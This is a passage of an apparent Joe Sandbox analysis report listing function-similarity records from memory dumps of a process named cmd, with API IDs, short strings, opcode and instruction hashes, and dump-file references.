                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: A251A736B04621A7E768CB17E8606DAB3A0F788B88F70491DDD5A83796DF38D945CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: 70bd97b601fda48e8cef92abd47afc0059184a4f271d2cc79991887cfa9f656f
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: 7251D735B14661A7E768DF17F86069AB3A0F388B8DF60451DDD5A83796DF38D805CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 9626df13e093560fff08b310d91827a5d95189e8b0a7e36c4d278c2a2bfa8a6e
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: F461FE36929B50D6E764CF16E4607AAB7A0F38874CF604519FA8D83BA9DB7DC540CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: 7986a2d5c8c51723cf784fe034c216ddcf0f23654953a820d8cf768348afba85
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 0C118F36B04750A3EB248B26F45468AA7B0FB48B98F14042EDE9D477A5EB7EC945C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 792061a4ee62e8d45a1b8d5f1813e47de47cb108d7bb074b7d3f71e821d459e9
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 2E510932B11620AADB5CCF17E864BAC37D9F354B9CF248918DE998778AD778C841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 20461cd6c146f0c2c25c89d5ff7b9a77972922ba07aa911b26247d3002ea1ba1
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: A651CF722907A0AAEB74AF1395643B877B0F354B9DF34411EDA8947BC6EB38C454CB09
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: b9ce1dd71692dc0b547fdc49359ee461310e818bd96e2b7ec8b7e86232b4c52c
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: F351B232A007A0ABEB788F23D56439877A1F355B9DF24491ADA99C7FD6CB78C450CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: d07ede96eefef2bd8c0b7d79333d7b8805c3e5291702ce41b41b146dbc3e515e
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 5D61B136904BD491EB348F16E4507DAB7A0F785B98F144A19EBD893F96DBBCC190CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: 66bd4f55da13f4b59e98e4acfdb28113792a7d8791dde31b7d88153922c324e0
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: A7115131B147A1B1FB149B27E8213DA62A4F748798FA4483DEE59C3696EF78C906C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: f219c63d4dc028b0b0ce1447489ac9524c0f6e21b6d9c99f1e0dca9cf36c20d2
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: 54D1DD32B14AA4A9E711CFA6D4502DC37B1F354BDCF60421ADE6DA7B9ADA34C15BC340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: 8a48e6d700463fcfeab801aff0800fb988a01873dc4cec5b61f32d991fb64db3
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: F0018C32A10BA0EAE714DF67E81418977A0F788F89F294029DF5E43729DF34D052C740
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000192916328DF), ref: 0000019291632A12
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 2e5d550bb0ff5774f388a2abceff763c23d2ba184b1813fa39a51aa8eb77a35e
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: A291AE32E10665AAFB648F6798603ED2BA0B754BDCF64410EDE6A57A96DB34C487C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: b29db566214d1f34b32fe81bc5787d43e233a910d2cd102b483550210b5c1b80
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 73113936B10F249AEB00CF61E8653E833A4F719B58F540E29EA6D87BA9DF78C155C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 434caa547e09e61b9d2bf416284cbbe34976128aa67481127ba319d742b5492f
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: 0771B636B04BA265EB78DF2B98643EA6794F3857C8F64441EDD4A83B8ADF35C605C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 3242871069-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: aa6aadf5c615c41b86438a76b312011be349341e2f6dd94f5e97f4297872b6ff
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 8151A432352A20AADB54EF17D464BBC33B1F744B9CF25866DDA464B78AE778C841C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: cf0e4d7c5a9e1b84fb1151a5ab56157b542282e9efdf3298abc1ca4b125cb260
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: B7619072508BC492DB71EF16E4507EAB7B0F785B98F14421DEB9807B9AEB78C190CB04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: 6b9847350dfc3aff0d3ab739328f00ad8d5b643e7919bbd7cad3dde2ed32d607
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 14411932B15AA0A6E710CF26E4147EAB7B4F7487C8F604129EE5D87799EB3CC402C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: ea0f61a0825c2f713fde2ac770492c1e305369da6509b86e8deb4b56c319cebf
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: 92116D32614B9092EB248F16F414289B7E1F789B88F684628EECD47B65DF3CC551CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: d29f7e25db6080f20b667190373a4e7c5aad767c995968ccf72db40605a2aabc
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: FF11C036A05B90A1EE14DB67E81429977B0F788FC4F684428DE4E93726EF38D442C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 48cf3d7c59958b70f863b85ab16a84aae97744e3c6331c76518c8e22097e42e3
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 1BE09231A01614AAE7148F63D82838936E1FB8CF0AF54C028C91907351EF7D84DAC741
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 4d2d8fbfc6eae9906d1ef74aa2bfe981601dd8b61b8a00053a5cac77688d4a2d
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: E0E01271A11614ABE7189F63DC1439976E1FB8CF1AF548028C91907311EE7C849AD711